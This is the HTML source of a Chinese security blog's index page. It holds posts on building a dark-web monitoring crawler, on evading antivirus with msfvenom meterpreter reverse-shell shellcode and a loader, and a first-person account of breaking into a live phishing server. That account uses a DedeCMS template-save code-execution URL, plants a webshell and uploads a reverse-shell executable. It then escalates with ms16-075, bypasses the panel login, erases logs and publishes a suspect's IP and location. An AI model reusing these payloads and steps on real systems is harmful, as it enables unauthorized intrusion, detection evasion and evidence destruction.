-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
3110 lines (1758 loc) · 115 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html class="theme-next muse use-motion" lang="zh-tw">
<head><meta name="generator" content="Hexo 3.8.0">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">
<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
<meta name="keywords" content="Hexo, NexT">
<link rel="alternate" href="/atom.xml" title="Jaychouzzk's blogs" type="application/atom+xml">
<meta name="keywords" content="safe blogs">
<meta property="og:type" content="website">
<meta property="og:title" content="Jaychouzzk's blogs">
<meta property="og:url" content="https://jaychouzzk.github.io/index.html">
<meta property="og:site_name" content="Jaychouzzk's blogs">
<meta property="og:locale" content="zh-tw">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Jaychouzzk's blogs">
<script type="text/javascript" id="hexo.configurations">
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
scheme: 'Muse',
version: '5.1.4',
sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
</script>
<link rel="canonical" href="https://jaychouzzk.github.io/">
<title>Jaychouzzk's blogs</title>
</head>
<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-tw">
<div class="container sidebar-position-left
page-home">
<div class="headband"></div>
<header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-wrapper">
<div class="site-meta ">
<div class="custom-logo-site-title">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<span class="site-title">Jaychouzzk's blogs</span>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<p class="site-subtitle"></p>
</div>
<div class="site-nav-toggle">
<button>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
</button>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section">
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
首頁
</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section">
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
歸檔
</a>
</li>
</ul>
</nav>
</div>
</header>
<main id="main" class="main">
<div class="main-inner">
<div class="content-wrap">
<div id="content" class="content">
<section id="posts" class="posts-expand">
<article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://jaychouzzk.github.io/2019/08/08/暗网监控搭建/">
<span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
<meta itemprop="name" content="Jaychouzzk">
<meta itemprop="description" content="">
<meta itemprop="image" content="/images/avatar.gif">
</span>
<span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Jaychouzzk's blogs">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
<a class="post-title-link" href="/2019/08/08/暗网监控搭建/" itemprop="url">记一次暗网监控搭建</a></h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">發表於</span>
<time title="創建於" itemprop="dateCreated datePublished" datetime="2019-08-08T00:00:00+08:00">
2019-08-08
</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>环境:Ubuntu 18.04</p>
<p>原文链接:<a href="https://github.com/aoii103/DarkNet_ChineseTrading" target="_blank" rel="noopener">https://github.com/aoii103/DarkNet_ChineseTrading</a></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt <span class="keyword">install</span> python3-pip</span><br><span class="line">pip3 <span class="keyword">install</span> <span class="comment">--upgrade pip</span></span><br></pre></td></tr></table></figure>
<h1 id="0x01、验证码识别:"><a href="#0x01、验证码识别:" class="headerlink" title="0x01、验证码识别:"></a>0x01、验证码识别:</h1><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">apt-get install -y tesseract-ocr libtesseract-dev libleptonica-dev</span><br><span class="line"> </span><br><span class="line">pip3 install tesserocr pillow</span><br><span class="line"> </span><br><span class="line">cp media<span class="regexp">/snum.traineddata /u</span>sr<span class="regexp">/share/</span>tesseract-ocr<span class="regexp">/4.00/</span>tessdata<span class="regexp">/</span></span><br></pre></td></tr></table></figure>
<h1 id="0x02、搭建tor服务器:"><a href="#0x02、搭建tor服务器:" class="headerlink" title="0x02、搭建tor服务器:"></a>0x02、搭建tor服务器:</h1><h2 id="1-安装tor"><a href="#1-安装tor" class="headerlink" title="1.安装tor"></a>1.安装tor</h2><p>在/etc/apt/sources.list添加如下源:</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">deb</span> http<span class="variable">s:</span>//<span class="keyword">deb</span>.torproject.org/torproject.org bionic main</span><br><span class="line"><span class="keyword">deb</span>-src http<span class="variable">s:</span>//<span class="keyword">deb</span>.torproject.org/torproject.org bionic main</span><br></pre></td></tr></table></figure>
<h2 id="2-添加gpg密钥,执行如下命令:"><a href="#2-添加gpg密钥,执行如下命令:" class="headerlink" title="2.添加gpg密钥,执行如下命令:"></a>2.添加gpg密钥,执行如下命令:</h2><figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl https://deb.torproject<span class="meta">.org</span>/torproject<span class="meta">.org</span>/A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89.asc | gpg --import</span><br><span class="line">gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key <span class="keyword">add</span> -</span><br></pre></td></tr></table></figure>
<h2 id="3-安装Tor:"><a href="#3-安装Tor:" class="headerlink" title="3.安装Tor:"></a>3.安装Tor:</h2><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt update</span><br><span class="line">apt install tor deb<span class="selector-class">.torproject</span><span class="selector-class">.org-keyring</span></span><br></pre></td></tr></table></figure>
<h2 id="4-配置tor"><a href="#4-配置tor" class="headerlink" title="4.配置tor:"></a>4.配置tor:</h2><figure class="highlight tap"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/tor/torrc</span><br><span class="line"> </span><br><span class="line">SOCKSPort<span class="number"> 9150 </span> <span class="comment"># socks5代理地址</span></span><br><span class="line">Socks5Proxy 127.0.0.1:1086 <span class="comment"># 科学上网代理地址(如已翻墙可不填)</span></span><br><span class="line">RunAsDaemon<span class="number"> 1 </span> <span class="comment"># 开启后台运行</span></span><br><span class="line">ControlPort<span class="number"> 9151 </span> <span class="comment"># 开启控制端口</span></span><br></pre></td></tr></table></figure>
<h2 id="5-error:"><a href="#5-error:" class="headerlink" title="5.error:"></a>5.error:</h2><p>出现此类错误的时候 <code>' error: command 'x86_64-linux-gnu-gcc' failed with exit status 1 '</code></p>
<p>for scrapy with Python 3, you’ll need</p>
<figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-<span class="built_in">get</span> install python3 python-<span class="built_in">dev</span> python3-<span class="built_in">dev</span> \</span><br><span class="line"> build-essential libssl-<span class="built_in">dev</span> libffi-<span class="built_in">dev</span> \</span><br><span class="line"> libxml2-<span class="built_in">dev</span> libxslt1-<span class="built_in">dev</span> zlib1g-<span class="built_in">dev</span> \</span><br><span class="line"> python-pip</span><br></pre></td></tr></table></figure>
<p>with Python 2, you’ll need</p>
<figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-<span class="built_in">get</span> install python-<span class="built_in">dev</span> \</span><br><span class="line"> build-essential libssl-<span class="built_in">dev</span> libffi-<span class="built_in">dev</span> \</span><br><span class="line"> libxml2-<span class="built_in">dev</span> libxslt1-<span class="built_in">dev</span> zlib1g-<span class="built_in">dev</span> \</span><br><span class="line"> python-pip</span><br></pre></td></tr></table></figure>
<h1 id="0x03、数据库安装:"><a href="#0x03、数据库安装:" class="headerlink" title="0x03、数据库安装:"></a>0x03、数据库安装:</h1><h2 id="Ubuntu-18-04安装docker"><a href="#Ubuntu-18-04安装docker" class="headerlink" title="Ubuntu 18.04安装docker"></a>Ubuntu 18.04安装docker</h2><p><a href="https://www.howtoing.com/how-to-install-and-use-docker-on-ubuntu-18-04" target="_blank" rel="noopener">https://www.howtoing.com/how-to-install-and-use-docker-on-ubuntu-18-04</a></p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">apt update</span><br><span class="line"> </span><br><span class="line">apt install apt-transport-https ca-certificates curl software-properties-common</span><br><span class="line"> </span><br><span class="line">curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key<span class="built_in"> add </span>-</span><br><span class="line"> </span><br><span class="line">sudo<span class="built_in"> add-apt-repository </span><span class="string">"deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable"</span></span><br><span class="line"></span><br><span class="line">apt-get update</span><br><span class="line"> </span><br><span class="line">apt-cache policy docker-ce</span><br><span class="line"> </span><br><span class="line">apt install docker-ce</span><br></pre></td></tr></table></figure>
<h2 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h2><p>mysql:</p>
<p><a href="https://cloud.tencent.com/developer/article/1439653" target="_blank" rel="noopener">https://cloud.tencent.com/developer/article/1439653</a></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">docker pull 下载镜像</span><br><span class="line"> </span><br><span class="line">docker images 已下载的镜像</span><br><span class="line"> </span><br><span class="line">docker run <span class="comment">--name mysql1 -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 -d mysql/mysql-server:latest 创建mysql-server容器</span></span><br><span class="line"> </span><br><span class="line">docker exec -it mysql1 mysql -uroot -p 连接容器中的数据库</span><br><span class="line"> </span><br><span class="line"><span class="keyword">use</span> mysql;</span><br><span class="line"><span class="keyword">update</span> <span class="keyword">user</span> <span class="keyword">set</span> host = <span class="string">'%'</span> <span class="keyword">where</span> <span class="keyword">user</span> = <span class="string">"root"</span>;</span><br><span class="line"><span class="keyword">flush</span> <span class="keyword">privileges</span>;</span><br><span class="line"> </span><br><span class="line">docker logs mysql1 查询日志</span><br><span class="line"></span><br><span class="line">docker exec -it mysql1 bash 登录shell</span><br><span class="line"> </span><br><span class="line">docker <span class="keyword">stop</span> mysql1 停止容器</span><br><span class="line"> </span><br><span class="line">docker <span class="keyword">start</span> mysql1</span><br><span class="line"></span><br><span class="line">docker restart mysql1</span><br><span class="line"></span><br><span class="line">docker <span class="keyword">stop</span> mysql1</span><br><span class="line"></span><br><span class="line">docker rm mysql1</span><br></pre></td></tr></table></figure>
<p>Redis:</p>
<p><a href="https://blog.csdn.net/myNameIssls/article/details/80520465" target="_blank" rel="noopener">https://blog.csdn.net/myNameIssls/article/details/80520465</a></p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">docker run --name redis -d -<span class="selector-tag">p</span> <span class="number">6379</span>:<span class="number">6379</span> redis --requirepass <span class="string">"admin"</span></span><br><span class="line"> </span><br><span class="line">docker container prune 删除所有停止的容器</span><br><span class="line"> </span><br><span class="line">docker rm $(docker ps -<span class="selector-tag">a</span> -q) 或者 docker rm $(docker ps -aq) 删除所有的容器</span><br></pre></td></tr></table></figure>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</div>
</article>
<article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://jaychouzzk.github.io/2019/08/08/msfvenom白加黑免杀/">
<span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
<meta itemprop="name" content="Jaychouzzk">
<meta itemprop="description" content="">
<meta itemprop="image" content="/images/avatar.gif">
</span>
<span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Jaychouzzk's blogs">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
<a class="post-title-link" href="/2019/08/08/msfvenom白加黑免杀/" itemprop="url">msfvenom白加黑免杀.</a></h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">發表於</span>
<time title="創建於" itemprop="dateCreated datePublished" datetime="2019-08-08T00:00:00+08:00">
2019-08-08
</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>通过一个shellcode加载器,加载我们生成的payload来进行免杀</p>
<p>shellcode加载器地址:<a href="https://github.com/clinicallyinane/shellcode_launcher" target="_blank" rel="noopener">https://github.com/clinicallyinane/shellcode_launcher</a></p>
<h2 id="1-msf生成shellcode:"><a href="#1-msf生成shellcode:" class="headerlink" title="1.msf生成shellcode:"></a>1.msf生成shellcode:</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp <span class="attribute">lhost</span>=192.168.2.102 <span class="attribute">lport</span>=6666</span><br><span class="line">-e x86/shikata_ga_nai -i 5 -f<span class="built_in"> raw </span>> /home/k/Desktop/shellcode.bin</span><br></pre></td></tr></table></figure>
<p>查看下shellcode加载器和我们生成的payload是否免杀</p>
<p><img src="/img/2019080801.jpg" alt=""></p>
<p><img src="/img/2019080802.jpg" alt=""></p>
<h2 id="2-使用shellcode加载我们的payload"><a href="#2-使用shellcode加载我们的payload" class="headerlink" title="2.使用shellcode加载我们的payload:"></a>2.使用shellcode加载我们的payload:</h2><p>服务端先进行监听:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line"><span class="meta">></span><span class="bash"> use exploit/multi/handler</span></span><br><span class="line"><span class="meta">></span><span class="bash"> <span class="built_in">set</span> payload windows/meterpreter/reverse_tcp</span></span><br><span class="line"><span class="meta">></span><span class="bash"> <span class="built_in">set</span> lhost 192.168.2.102</span></span><br><span class="line"><span class="meta">></span><span class="bash"> <span class="built_in">set</span> lport 6666</span></span><br><span class="line"><span class="meta">></span><span class="bash"> run</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/2019080803.jpg" alt=""></p>
<p>客户端进行加载我们的shellcode</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shellcode_launcher<span class="selector-class">.exe</span> -<span class="selector-tag">i</span> shellcode.bin</span><br></pre></td></tr></table></figure>
<p><img src="/img/2019080804.jpg" alt=""></p>
<p>成功获取会话</p>
<p><img src="/img/2019080805.jpg" alt=""></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</div>
</article>
<article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://jaychouzzk.github.io/2019/04/18/记一次攻击钓鱼网站服务器/">
<span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
<meta itemprop="name" content="Jaychouzzk">
<meta itemprop="description" content="">
<meta itemprop="image" content="/images/avatar.gif">
</span>
<span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Jaychouzzk's blogs">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
<a class="post-title-link" href="/2019/04/18/记一次攻击钓鱼网站服务器/" itemprop="url">记一次攻击钓鱼网站服务器</a></h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">發表於</span>
<time title="創建於" itemprop="dateCreated datePublished" datetime="2019-04-18T00:00:00+08:00">
2019-04-18
</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h1 id="0X01-引言"><a href="#0X01-引言" class="headerlink" title="0X01 引言"></a>0X01 引言</h1><p>前段时间刚好遇到了一个以dedeCMS为后台管理的钓鱼网站,但是当时没有什么思路提权就放弃了,后来在信安之路看到了了一个关于攻击这种钓鱼网站的帖子,晓得了怎么再进行下一步提权并溯源的操作。</p>
<p>然而刚刚好,xxx同学发给我了一个和之前遇到的一模一样的钓鱼站,遂有了下面的故事</p>
<p>此次是为了记录学习一些操作</p>
<h1 id="0X02-入侵钓鱼站"><a href="#0X02-入侵钓鱼站" class="headerlink" title="0X02 入侵钓鱼站"></a>0X02 入侵钓鱼站</h1><h2 id="GetShell"><a href="#GetShell" class="headerlink" title="GetShell"></a>GetShell</h2><p>由于有了之前那位小姐姐的帖子,没有进行信息搜集就直接开干了</p>
<p>网站域名一般为:<code>http://xxxx.icu/Ru_op/</code>这种格式的</p>
<p><code>http://xxxx.icu/dede/</code><br>是网站的管理后台</p>
<p>通过<code>DedeCMS V5.7 SP2后台存在代码执行漏洞</code></p>
<p>参考链接:<br><code>https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS%20V5.7%20SP2%E5%90%8E%E5%8F%B0%E5%AD%98%E5%9C%A8%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E</code></p>
<p>首先,需要先获取到自己的<code>token</code><br><code>5f4193b27040861d563fe3505f90d5de</code></p>
<p><img src="/img/diaoyu_1.png" alt=""></p>
<p>然后带入到<br><code>域名 + /dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值</code>里边</p>
<p>在这里执行<br><code>http://xxxx.icu/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[5f4193b27040861d563fe3505f90d5de</code></p>
<p><img src="/img/diaoyu_2.png" alt=""></p>
<p>在<code>http://xxxx.icu/include/taglib/secnote.lib.php</code>查看返回结果<br>这里有一个关键的信息</p>
<p><img src="/img/diaoyu_3.png" alt=""></p>
<p>将原来的<code><?php phpinfo()?></code>修改为一句话,然后用菜刀连接上,成功getshell<br>这里要注意,菜刀连接的方式需要选择base64编码,不然会出现错误</p>
<p><img src="/img/diaoyu_4.png" alt=""></p>
<p>这里要注意,这个钓鱼站点默认是关闭了系统函数的,这就需要修改<code>php.ini</code>中的<code>disable_functions</code><br>虽然现在的用户权限无法读取<code>BTsoft</code>目录下的内容,但是可以直接读取<code>D:/BtSoft/WebSoft/php/5.2/</code>目录,因为网站是基于这个php文件运行的,所以拥有相同的权限,这样我们就可以修改<code>php.ini</code>文件了</p>
<p>在这里我已经修改完毕了</p>
<p><img src="/img/diaoyu_5.png" alt=""></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>上传做好的反弹shell的木马程序</p>
<p><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe > shell.exe</code></p>
<p><img src="/img/diaoyu_6.png" alt=""></p>
<p>然后在VPS上监听所设置的端口,并将获取到的meterpreter会话放置到后台,再使用<code>ms16-075</code>进行提权</p>
<p><img src="/img/diaoyu_7.png" alt=""></p>
<p>提权成功!接下来就是创建用户,开启远程桌面了。</p>
<h1 id="0X03开启远程桌面"><a href="#0X03开启远程桌面" class="headerlink" title="0X03开启远程桌面"></a>0X03开启远程桌面</h1><p>当时开启远程桌面的时候不晓得为什么一直无法开启,后来想想,应该是修改了远程桌面的端口,查看端口发现一个8611端口,是宝塔的web服务端口</p>
<p>不晓得账号密码,怎么登录呢,在这里我将代码逻辑修改了下,不将获取到的用户名密码与数据库进行比对,直接登录</p>
<p>成功登录!</p>
<p><img src="/img/diaoyu_8.png" alt=""></p>
<p>说实话,宝塔面板真的挺好用</p>
<p>登录远程桌面</p>
<p><img src="/img/diaoyu_9.png" alt=""></p>
<h1 id="0X04清理痕迹"><a href="#0X04清理痕迹" class="headerlink" title="0X04清理痕迹"></a>0X04清理痕迹</h1><p>这里没有认真的清理自己所留下的痕迹,主要清除的是面板操作日志</p>
<p><img src="/img/diaoyu_10.png" alt=""></p>
<p>这一步也做了好久,才发现宝塔的数据以及面板日志都存放在了<code>D:\BtSoft\ServerAdmin\bt_default.sqlite</code>文件中</p>
<p>使用<code>Dbeaver</code>打开<code>bt_default.sqlite</code>,并将我的登录和操作痕迹擦除</p>
<p><img src="/img/diaoyu_11.png" alt=""></p>
<h1 id="结尾"><a href="#结尾" class="headerlink" title="结尾"></a>结尾</h1><p>搜集了下服务器信息,发现经常登录的一个IP<br> 223.111.137.157(这个应该是钓鱼的人的IP)<br> 江苏省镇江市<br> 定位半径:0米<br> 纬度坐标:27.922104<br> 经度坐标:116.351444<br> 详细地址:江西省 抚州市 临川区<br> 精确地址:江西省抚州市临川区 下饶东南148米</p>
<p>也没啥好玩的了,没有jsonp漏洞,也获取不到其他的信息了,溜了溜了</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</div>
</article>
<article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://jaychouzzk.github.io/2019/03/26/HTTP POST GET 本质区别详解/">
<span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
<meta itemprop="name" content="Jaychouzzk">
<meta itemprop="description" content="">
<meta itemprop="image" content="/images/avatar.gif">
</span>
<span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Jaychouzzk's blogs">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
<a class="post-title-link" href="/2019/03/26/HTTP POST GET 本质区别详解/" itemprop="url">HTTP POST GET 本质区别详解</a></h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">發表於</span>
<time title="創建於" itemprop="dateCreated datePublished" datetime="2019-03-26T00:00:00+08:00">
2019-03-26
</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<blockquote>
<p>参考链接:<br><a href="https://sunshinevvv.coding.me/blog/2017/02/09/HttpGETv.s.POST/" target="_blank" rel="noopener">HTTP协议中GET和POST方法的区别</a><br><a href="https://blog.csdn.net/gideal_wang/article/details/4316691" target="_blank" rel="noopener">HTTP POST GET 本质区别详解</a></p>
</blockquote>
<h1>一.原理区别</h1>
<p>一般再浏览器中输入网址访问资源都是通过<code>GET</code>方式;在<code>FORM</code>表单中提交数据,可以通过<code>METHOD</code>指定方式进行提交,默认为<code>GET</code>请求提交,还可以设置为<code>POST</code>请求进行提交</p>
<p>HTTP定义了与服务器交互的不同方法,最基本的方法有四种:<code>GET,POST,PUT,DELETE</code></p>
<p>分别对应着<code>查,改,增,删</code>,四个操作,一般<code>GET</code>用于获取查询资源信息,<code>POST</code>一般用于更新资源信息</p>
<p>根据HTTP规范,<code>GET用于信息的获取,而且应该是安全的、幂等的</code></p>
